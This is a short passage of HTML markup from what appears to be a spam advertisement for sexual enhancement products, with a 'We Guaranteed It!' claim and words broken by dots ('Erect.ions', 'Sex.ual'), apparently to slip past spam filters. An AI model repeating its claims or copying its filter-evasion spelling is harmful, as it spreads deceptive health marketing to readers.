-We Guaranteed It!</font></font></b><b><font face="Verdana"><font size=-1></font></b>
<p><b><font face="Verdana">Maintain Rock Solid Erect.ions.</font></font></b>
<br><b><font face="Verdana">Increased Sex.ual Desire &
P
